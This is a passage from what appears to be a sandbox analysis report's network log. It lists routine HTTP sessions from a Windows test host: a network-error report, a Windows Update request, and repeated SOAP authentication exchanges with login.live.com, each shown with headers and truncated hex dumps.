                                                                                                                                          2024-04-12 07:16:58 UTC942OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 32 30 30 31 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 36 38 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69
                                                                                                                                          Data Ascii: [{"age":120017,"body":{"elapsed_time":4685,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bi
                                                                                                                                          2024-04-12 07:17:10 UTC359INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:02 GMT
                                                                                                                                          Content-Length: 21
                                                                                                                                          Connection: close
                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                          X-CDN-TraceId: 0.25b22817.1712906221.1388804f
                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                          Access-Control-Allow-Methods: *
                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          2024-04-12 07:17:10 UTC21INData Raw: 50 72 6f 63 65 73 73 65 64 20 74 68 65 20 72 65 71 75 65 73 74
                                                                                                                                          Data Ascii: Processed the request


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          35192.168.2.54980820.12.23.50443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:04 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Cxs3NSu92DAgRPg&MD=sCpdzsBH HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          36192.168.2.54980940.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:25 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:17:25 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:30 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:28 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C503_BL2
                                                                                                                                          x-ms-request-id: 87305a2d-4f18-4d1b-be18-e0d7beb665c2
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D969 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:29 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11392
                                                                                                                                          2024-04-12 07:17:30 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          37192.168.2.54981040.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:30 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:17:30 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:31 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:31 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BL2
                                                                                                                                          x-ms-request-id: 838bb09a-629b-45bf-b775-262c3ea869c2
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001DA45 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:30 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1918
                                                                                                                                          2024-04-12 07:17:31 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          38192.168.2.54981140.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:31 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:17:31 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:32 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:32 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BL2
                                                                                                                                          x-ms-request-id: 46bd007c-af09-432d-bc16-f5d98adda072
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D8C2 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:31 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1918
                                                                                                                                          2024-04-12 07:17:32 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          39192.168.2.54981240.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:32 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:17:32 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:34 UTC569INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:34 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C503_BL2
                                                                                                                                          x-ms-request-id: 72a886ce-5d30-4921-a8a6-8f97affc1050
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001DA4E V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:34 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 11392
                                                                                                                                          2024-04-12 07:17:34 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          40192.168.2.54981340.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:33 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:17:33 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:17:33 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:16:33 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BL2
                                                                                                                                          x-ms-request-id: 0907220d-5008-49aa-a35f-0bd59db81808
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D798 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:17:32 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1918
                                                                                                                                          2024-04-12 07:17:33 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          41192.168.2.54981440.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:17:35 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 4775
                                                                                                                                          Host: login.live.com
